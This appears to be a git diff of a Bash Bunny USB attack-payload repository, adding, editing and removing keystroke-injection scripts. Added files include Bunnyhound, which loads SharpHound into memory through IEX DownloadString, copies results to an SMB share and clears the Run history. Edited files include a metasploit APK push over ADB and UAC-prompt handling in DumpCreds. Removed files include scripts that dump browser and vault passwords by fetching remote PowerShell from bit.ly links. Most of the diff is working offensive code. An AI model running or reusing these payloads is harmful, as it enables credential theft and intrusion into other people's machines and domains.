|
||||
[[ -z "$os" || -z "$*" ]] && exit 1 # Both OS and Command parameter must be set
|
||||
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK GUI r
|
||||
@@ -37,6 +37,13 @@ function RUN() {
|
||||
QUACK DELAY 500
|
||||
QUACK ENTER
|
||||
;;
|
||||
LINUX)
|
||||
QUACK ALT F2
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "$@"
|
||||
QUACK DELAY 500
|
||||
QUACK ENTER
|
||||
;;
|
||||
*)
|
||||
# OS parameter must be one of the above
|
||||
exit 1
|
||||
|
||||
50
payloads/extensions/runpayload.sh
Executable file
50
payloads/extensions/runpayload.sh
Executable file
@@ -0,0 +1,50 @@
|
||||
#!/bin/bash
|
||||
|
||||
#Payload selector by Dragonkeeper
|
||||
# Allows selecting payloads by amount of switch changes
|
||||
#
|
||||
#Step1. put all your payloads into a folder
|
||||
#
|
||||
#Step2. in the switch folder make a payload.txt and define the payloads and the dir to use as variables. like so:
|
||||
#scriptfolder=" /root/udisk/payloads/payloads/ "
|
||||
#script1="payload1.txt"
|
||||
#script2="payload2.txt"
|
||||
#
|
||||
#Step3. now call the extension as with the payloads you would like to use
|
||||
#RUN_PAYLOAD $scriptfolder $script1 $script2 $script3 $script4
|
||||
#
|
||||
# LED will go red, to let you know its ready. It is currently about to execute the 1st given payload
|
||||
# the LED will blue, to let you decide if you want to run that payload. if yes do nothing, if no flick the switch.
|
||||
#
|
||||
# if you flicked the switch, the LED will flash green to indicate this, it will then flick to red and go blue, it is now on the 2nd given payload and awaiting decision.
|
||||
#
|
||||
# if you leave the switch alone while its blue, the LED will go solid green to indicate that the selection is locked in.
|
||||
# and the payload of the given number will run.
|
||||
#
|
||||
# This will let you add as many payloads as you desire.
|
||||
|
||||
function RUN_PAYLOAD() {
|
||||
payloadcount=$#
|
||||
payloadarray=("$@")
|
||||
PAYLOAD=1
|
||||
LED R
|
||||
sleep 3
|
||||
while [ $payloadcount -ge $PAYLOAD ]; do
|
||||
LED R
|
||||
GET SWITCH_POSITION
|
||||
TEST=$SWITCH_POSITION
|
||||
LED B
|
||||
sleep 2
|
||||
GET SWITCH_POSITION
|
||||
if [ $SWITCH_POSITION == $TEST ]; then
|
||||
LED G
|
||||
"${payloadarray[0]}""${payloadarray["$PAYLOAD"]}"
|
||||
return
|
||||
fi
|
||||
LED G FAST
|
||||
PAYLOAD=$((PAYLOAD+1))
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f RUN_PAYLOAD
|
||||
60
payloads/extensions/setkb.sh
Normal file → Executable file
60
payloads/extensions/setkb.sh
Normal file → Executable file
@@ -7,45 +7,45 @@
|
||||
# Examples:
|
||||
# SETKB START (set the keyboard layout to a US keyboard layout)
|
||||
# SETKB DONE (set the keyboard layout to the default keyboard determined by the OS language settings)
|
||||
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
|
||||
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
|
||||
|
||||
|
||||
function SETKB() {
|
||||
local state=$1
|
||||
shift
|
||||
|
||||
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
|
||||
|
||||
case "$state" in
|
||||
'START')
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
local state=$1
|
||||
shift
|
||||
|
||||
;;
|
||||
'DONE')
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK "STRING powershell.exe \$back2kb=(get-Culture | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$back2kb -force; "
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
|
||||
|
||||
;;
|
||||
|
||||
*)
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
case "$state" in
|
||||
'START')
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
|
||||
;;
|
||||
;;
|
||||
'DONE')
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
|
||||
;;
|
||||
|
||||
*)
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
|
||||
;;
|
||||
|
||||
|
||||
|
||||
esac
|
||||
esac
|
||||
}
|
||||
|
||||
export -f SETKB
|
||||
|
||||
17
payloads/extensions/wait.sh
Executable file
17
payloads/extensions/wait.sh
Executable file
@@ -0,0 +1,17 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# WAIT v1 by @Hak5Darren
|
||||
# Waits blocks the payload from continuing until the switch position has changed
|
||||
# Usage: WAIT
|
||||
|
||||
function WAIT() {
|
||||
GET SWITCH_POSITION
|
||||
TEST=$SWITCH_POSITION
|
||||
while true
|
||||
do GET SWITCH_POSITION
|
||||
if [ $SWITCH_POSITION != $TEST ]; then break; fi
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT
|
||||
14
payloads/extensions/waiteject.sh
Executable file
14
payloads/extensions/waiteject.sh
Executable file
@@ -0,0 +1,14 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# WAITEJECT v1 by kamotswind (https://github.com/kamotswind)
|
||||
# Blocks the payload from continuing until the USB storage is ejected from the host
|
||||
# Usage: WAITEJECT
|
||||
|
||||
function WAITEJECT() {
|
||||
until [ ! -z "`dmesg | grep \"usb close backing file\"`" ]
|
||||
do
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAITEJECT
|
||||
@@ -1,18 +1,24 @@
|
||||
# Title: Firey TV
|
||||
# Author: DemmSec
|
||||
# Version: 1.0
|
||||
#
|
||||
# Enables ADB and unknown sources on a target FireTV
|
||||
# Then pushes a payload APK via ADB
|
||||
#
|
||||
# Title: Firey TV
|
||||
# Author: DemmSec
|
||||
# Version: 1.0
|
||||
# Description:
|
||||
# Enables ADB and unknown sources on a target FireTV, Then pushes a payload APK via ADB.
|
||||
# Requires android-tools-adb installed on the Bash Bunny
|
||||
#
|
||||
# Purple ............Running HID emulation, enabling ADB and unknown sources
|
||||
# Blue Blinking ...............Running ADB command to push payload.apk
|
||||
# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
|
||||
# Green..............Finished
|
||||
# LEDS:
|
||||
# Purple: Running HID emulation, enabling ADB and unknown sources
|
||||
# Blue Blinking: Running ADB command to push payload.apk
|
||||
# Red Blinking: FireTV failed to get an IP address from the Bash Bunny
|
||||
# Green: Finished
|
||||
#
|
||||
# Target: Android (4.4.2)
|
||||
|
||||
LED SETUP
|
||||
GET TARGET_IP
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID
|
||||
LED R B 0
|
||||
LED ATTACK
|
||||
Q RIGHTARROW
|
||||
Q DELAY 200
|
||||
Q RIGHTARROW
|
||||
@@ -64,12 +70,11 @@ Q DELAY 200
|
||||
Q ESCAPE
|
||||
ATTACKMODE ECM_ETHERNET
|
||||
LED B 2000
|
||||
source bunny_helpers.sh
|
||||
if [ -z "${TARGET_IP}" ]; then
|
||||
LED R 2000
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
adb connect ${TARGET_IP}
|
||||
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
|
||||
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
|
||||
LED G
|
||||
LED FINISH
|
||||
|
||||
@@ -1,13 +1,16 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Android Open Url (unlocked)
|
||||
# Author: bg-wa
|
||||
# Version: 1.0
|
||||
# Target: Android (4.2.2)
|
||||
# Props: Hak5
|
||||
#
|
||||
# Title: Android Open Url (unlocked)
|
||||
# Author: bg-wa
|
||||
# Version: 1.0
|
||||
# Target: Android (4.2.2)
|
||||
# Props: Hak5
|
||||
# Description:
|
||||
# Opens the browser to a specified url on an unlocked android phone.
|
||||
#
|
||||
# LEDS:
|
||||
# Green - Starting
|
||||
# Red - Complete
|
||||
|
||||
LED G
|
||||
|
||||
|
||||
@@ -1,77 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: BrowserCreds
|
||||
# Author: illwill
|
||||
# Version: 0.1
|
||||
#
|
||||
# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
|
||||
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
|
||||
# Credits to these guys for their powershell scripts:
|
||||
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
|
||||
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
|
||||
|
||||
#script
|
||||
# Blue...............Running Script
|
||||
# Purple.............Got Browser Creds
|
||||
|
||||
|
||||
LED R 200
|
||||
LOOTDIR=/root/udisk/loot/BrowserCreds
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
LED B 200
|
||||
|
||||
# wait 6 seconds for the storage to popup
|
||||
Q DELAY 6000
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING POWERSHELL
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
#Dump Credential Vault (I.E./Edge)
|
||||
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
|
||||
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
|
||||
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
|
||||
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
#Dump Chrome Creds
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft UserURL\, Password -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt -width 250
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
|
||||
|
||||
#Open 32bit powershell and Dump Firefox Creds
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING Out-File -FilePath \$BUNNY\\loot\\BrowserCreds\\DONE
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
sync
|
||||
LED R B 200
|
||||
|
||||
FILE="/root/udisk/loot/BrowserCreds/DONE"
|
||||
while [ ! -e $FILE ]; do sleep 1; done;
|
||||
sleep 1;
|
||||
if [ -e $FILE ]; then rm -f $FILE; LED G 200; else LED R; fi
|
||||
@@ -1,27 +0,0 @@
|
||||
# BrowserCreds
|
||||
|
||||
* Author: illwill
|
||||
* Version: Version 0.1
|
||||
* Target: Windows
|
||||
|
||||
## Description
|
||||
|
||||
Dumps the stored plaintext Browser passwords from Windows boxes using
|
||||
Powershell HID attack, then stashes them in /root/udisk/loot/BrowserCreds/
|
||||
|
||||
## Configuration
|
||||
|
||||
None needed.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| White (blinking) | Setting up |
|
||||
| Blue (blinking) | Attack running |
|
||||
| Purple (blinking) | Dumping Browser Credentials |
|
||||
| Green (blinking) | Succeeded Dumping Browser Credentials |
|
||||
| Red (blinking) | Failed Dumping Browser Credentials |
|
||||
|
||||
## Discussion
|
||||
https://forums.hak5.org/index.php?/topic/40431-payload-browsercreds
|
||||
@@ -1,19 +1,24 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: BruteBunny
|
||||
# Author: Decoy
|
||||
# Version: 1.0
|
||||
# Category: Password Recovery
|
||||
# Target: Windows XP SP3+
|
||||
#
|
||||
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
|
||||
# access to the admin panel.
|
||||
# Title: BruteBunny
|
||||
# Author: Decoy
|
||||
# Version: 1.0
|
||||
# Target: Windows XP SP3+
|
||||
#
|
||||
# Description:
|
||||
# Will attempt to bruteforce common router username/password combinations in an attempt to gain
|
||||
# access to the admin panel.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Blink: Attack Stage 1
|
||||
# Yellow Double Blink: Attack Stage 2
|
||||
# Green Rapid to Solid: Finished
|
||||
|
||||
# init
|
||||
LED R B
|
||||
LED SETUP
|
||||
|
||||
# need SWITCH_POSITION, so give it to me. please. thank you.
|
||||
source bunny_helpers.sh
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# set up the things to make it do stuff
|
||||
mkdir -p /root/udisk/BruteBunny/loot
|
||||
@@ -28,12 +33,12 @@ sync;sleep 1;sync
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
# wait for storage
|
||||
LED R G B 100
|
||||
LED STAGE1
|
||||
QUACK DELAY 6000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
# unleash the brute bunny
|
||||
LED B 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
|
||||
QUACK ENTER
|
||||
sleep 10
|
||||
@@ -41,4 +46,4 @@ sleep 10
|
||||
# sync the stuff
|
||||
sync;sleep 1;sync
|
||||
|
||||
LED G
|
||||
LED FINISH
|
||||
|
||||
@@ -1,8 +1,16 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: BunnyTap
|
||||
# Author: Whistle Master
|
||||
# Version: 1.0
|
||||
# Title: BunnyTap
|
||||
# Version: 1.0
|
||||
# Author: Whistle Master
|
||||
# Props: Samy Kamkar
|
||||
# Description:
|
||||
# PoisonTap for the BashBunny
|
||||
#
|
||||
# LEDS:
|
||||
# White Blinking: No DNSSpoof found
|
||||
# Green Blinking: Starting Attack
|
||||
# Blue: Started Attack
|
||||
|
||||
# Enable Ethernet (RNDIS = Windows, ECM = mac/*nix)
|
||||
#ATTACKMODE RNDIS_ETHERNET
|
||||
@@ -35,4 +43,4 @@ fi
|
||||
LED G 200
|
||||
setupNetworking
|
||||
startBunnyTap
|
||||
LED B 0
|
||||
LED B 0
|
||||
|
||||
446
payloads/library/credentials/Bunnyhound/SharpHound.ps1
Normal file
446
payloads/library/credentials/Bunnyhound/SharpHound.ps1
Normal file
File diff suppressed because one or more lines are too long
71
payloads/library/credentials/Bunnyhound/payload.txt
Normal file
71
payloads/library/credentials/Bunnyhound/payload.txt
Normal file
@@ -0,0 +1,71 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Bunnyhound
|
||||
# Author: golem445
|
||||
# Version: 1.0
|
||||
# Dependencies: Impacket, gohttp
|
||||
# Runtime: Dependent on domain size
|
||||
#
|
||||
# Description:
|
||||
# Sets up Ethernet and HID keyboard interfaces simultaneously,
|
||||
# then uses HID to import Sharphound into memory via local
|
||||
# web server and execute the attack. Results are exported
|
||||
# to the loot directory via SMB.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Blinking: Attack Phase 1
|
||||
# Yellow Double Blinking: Attack Phase 2
|
||||
# White Rapid Blinking: Cleaning Up
|
||||
# Green: Attack Finished
|
||||
#
|
||||
# Start Setup
|
||||
LED SETUP
|
||||
|
||||
# Check dependencies
|
||||
REQUIRETOOL impacket gohttp
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# Temporary loot directory
|
||||
mkdir -p /loot/smb/
|
||||
|
||||
# Permanent loot directory
|
||||
mkdir -p /root/udisk/loot/bunnyhound_exfil/
|
||||
|
||||
# Set interfaces
|
||||
ATTACKMODE RNDIS_ETHERNET HID
|
||||
|
||||
# Start web server
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION
|
||||
gohttp -p 80 &
|
||||
|
||||
# Start SMB Server
|
||||
python /tools/impacket/examples/smbserver.py s /loot/smb &
|
||||
|
||||
# Start attack
|
||||
LED ATTACK
|
||||
RUN WIN powershell
|
||||
Q STRING "IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"
|
||||
Q ENTER
|
||||
|
||||
# Wait until files are done copying.
|
||||
LED STAGE2
|
||||
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
||||
|
||||
# Start Cleanup
|
||||
LED CLEANUP
|
||||
|
||||
# Delete Exfil file
|
||||
rm /loot/smb/EXFILTRATION_COMPLETE
|
||||
|
||||
# Move Kerberos SPNS to permanent loot directory
|
||||
mv /loot/smb/* /root/udisk/loot/bunnyhound_exfil/
|
||||
|
||||
# Clean up temporary loot directory
|
||||
rm -rf /loot/smb/*
|
||||
|
||||
# Sync file system
|
||||
sync
|
||||
|
||||
# Complete
|
||||
LED FINISH
|
||||
32
payloads/library/credentials/Bunnyhound/readme.md
Normal file
32
payloads/library/credentials/Bunnyhound/readme.md
Normal file
@@ -0,0 +1,32 @@
|
||||
# Bunnyhound
|
||||
* Author: golem445
|
||||
* Version: 1.0
|
||||
* Target: Windows Domains
|
||||
|
||||
## Description
|
||||
|
||||
Sets up Ethernet and HID keyboard interfaces simultaneously,
|
||||
then uses HID to import Sharphound into memory via Bash Bunny
|
||||
web server and execute the attack. Results are exported to
|
||||
the loot directory via SMB.
|
||||
|
||||
Note: This module will bypass network restrictions on USB
|
||||
disk drives as only a network card and keyboard are emulated.
|
||||
|
||||
## Requirements
|
||||
|
||||
Impacket and gohttp should be installed
|
||||
|
||||
## STATUS
|
||||
|
||||
| Status | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| Flashing Red | Impacket or gohttp not found |
|
||||
| Solid Violet | Setup for attack |
|
||||
| Flashing Amber | Attack in progress |
|
||||
| Flashing Cyan | Cleaning up |
|
||||
| Solid Green | Attack complete |
|
||||
|
||||
## Credits
|
||||
|
||||
* Hak5Darren for SMB exfil
|
||||
5
payloads/library/credentials/Bunnyhound/s.ps1
Normal file
5
payloads/library/credentials/Bunnyhound/s.ps1
Normal file
@@ -0,0 +1,5 @@
|
||||
IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/Sharphound.ps1');Invoke-Bloodhound -NoSaveCache -CompressData
|
||||
move Blood* \\172.16.64.1\s\
|
||||
New-Item -Path \\172.16.64.1\s -ItemType "file" -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
||||
exit
|
||||
@@ -1,28 +1,25 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: DumpCreds 2.1
|
||||
# Author: QDBA
|
||||
# Version: 2.1.0
|
||||
# Build: 1004
|
||||
# Category: Exfiltration
|
||||
# Target: Windows Windows 10 (Powershell)
|
||||
# Attackmodes: HID, Ethernet
|
||||
# !!! works only with Bash Bunny FW 1.1 and up !!!
|
||||
#
|
||||
#
|
||||
# LED Status
|
||||
# ----------------------- + --------------------------------------------
|
||||
# SETUP + Setup
|
||||
# FAIL + No /tools/impacket/examples/smbserver.py found
|
||||
# FAIL2 + Target did not acquire IP address
|
||||
# Yellow single blink + Initialization
|
||||
# Yellow double blink + HID Stage
|
||||
# Yellow triple blink + Wait for IP coming up
|
||||
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
|
||||
# Cyan inv quint blink + Powershell scripts running
|
||||
# White fast blink + Cleanup, copy Files to <root>/loot
|
||||
# Green + Finished
|
||||
# ----------------------- + --------------------------------------------
|
||||
# Title: DumpCreds 2.1
|
||||
# Author: QDBA
|
||||
# Version: 2.1.0
|
||||
# Build: 1004
|
||||
# Target: Windows 10
|
||||
# Attack Modes: HID, RNDIS_ETHERNET
|
||||
# Description:
|
||||
# Works only with Bash Bunny FW 1.1 and up.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Red: No /tools/impacket/examples/smbserver.py found
|
||||
# Red Blinking: Target did not acquire IP address
|
||||
# Yellow Blink: Initialization
|
||||
# Yellow Double Blink: HID Stage
|
||||
# Yellow Triple Blink: Wait for IP coming up
|
||||
# Cyan Blink: Wait for Handshake (SMBServer Coming up)
|
||||
# Cyan Quintuple Blink: Powershell scripts running
|
||||
# White Rapid Blink: Cleanup, copy Files to <root>/loot
|
||||
# Green: Finished
|
||||
|
||||
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
|
||||
|
||||
@@ -30,6 +27,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #
|
||||
###### Lets Start ####
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# Some Variables
|
||||
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
@@ -39,13 +37,13 @@ LOOTDIR=$SWITCHDIR/loot
|
||||
if [ -f $SWITCHDIR/DEBUG ];then
|
||||
DEBUG=1 # 1= Debug on / 0= Debug off
|
||||
tail -f /var/log/syslog > /tmp/log.txt &
|
||||
else
|
||||
else
|
||||
DEBUG=0
|
||||
fi
|
||||
|
||||
mkdir -p $LOOTDIR
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
REQUIRETOOL impacket
|
||||
REQUIRETOOL impacket
|
||||
|
||||
# remove old Handshake Files
|
||||
rm -f $SWITCHDIR/CON_*
|
||||
@@ -60,8 +58,8 @@ Q DELAY 5000
|
||||
|
||||
# Launch initial cmd
|
||||
if [ $DEBUG -eq 1 ]; then
|
||||
RUN WIN cmd
|
||||
else
|
||||
RUN WIN cmd
|
||||
else
|
||||
RUN WIN cmd /k mode con lines=1 cols=100
|
||||
fi
|
||||
|
||||
@@ -69,7 +67,7 @@ fi
|
||||
Q DELAY 1000
|
||||
if [ $DEBUG -eq 1 ]; then
|
||||
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
|
||||
else
|
||||
else
|
||||
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
|
||||
fi
|
||||
Q DELAY 500
|
||||
@@ -77,12 +75,12 @@ Q ENTER
|
||||
|
||||
|
||||
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
|
||||
|
||||
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
|
||||
# now the second powershell command goes to the admin cmd windows.
|
||||
|
||||
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
|
||||
# the second powershell command goes to the cmd Windows I open first.
|
||||
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
|
||||
# now the second powershell command goes to the admin cmd windows.
|
||||
|
||||
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
|
||||
# the second powershell command goes to the cmd Windows I open first.
|
||||
Q DELAY 1000
|
||||
Q ALT j
|
||||
Q DELAY 500
|
||||
@@ -109,7 +107,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
|
||||
# Ethernet Tage
|
||||
LED STAGE3
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
# Source bunny_helpers.sh to get environment variables
|
||||
|
||||
logger -t DumpCred_2.1 "### Start SMBServer ###"
|
||||
# Start SMB Server
|
||||
@@ -149,7 +146,7 @@ logger -t DumpCred_2.1 "### cleanup and copy files ###"
|
||||
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
|
||||
mkdir -p /root/udisk/loot/DumpCred_2.1
|
||||
fi
|
||||
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
|
||||
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
|
||||
rmdir $LOOTDIR
|
||||
rm -f $SWITCHDIR/CON_EOF
|
||||
|
||||
@@ -163,4 +160,4 @@ fi
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET STORAGE
|
||||
sync; sleep 1; sync
|
||||
LED FINISH
|
||||
LED FINISH
|
||||
|
||||
@@ -1,162 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: JackRabbit
|
||||
# Author: illwill
|
||||
# Version: 0.1
|
||||
#
|
||||
# Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
|
||||
# Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
|
||||
#
|
||||
# Credits to these guys for their powershell scripts:
|
||||
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
|
||||
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
|
||||
# https://github.com/fireeye/SessionGopher SessionGopher .ps1
|
||||
# https://github.com/gentilkiwi/mimikatz md.ps1 from gentilkiwi/clymb3r/mattifestation obfuscated to mimidogz
|
||||
|
||||
#script
|
||||
# Purple...............Jackin dat loot
|
||||
# Green................Jacked dat loot
|
||||
# Red Blue.............PoPo caught yo ass
|
||||
|
||||
|
||||
LED R B 200
|
||||
LOOTDIR=/root/udisk/loot/JackRabbit
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
LED B 200
|
||||
|
||||
# wait 6 seconds for the storage to popup
|
||||
Q DELAY 6000
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING POWERSHELL
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Make the loot folder of the computername
|
||||
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING md \$LOOTDIR2
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' Credential Vault (I.E./Edge)
|
||||
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
|
||||
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
|
||||
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
|
||||
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' Chrome Creds
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
|
||||
# Open 32bit powershell and Jackin' Firefox Creds
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
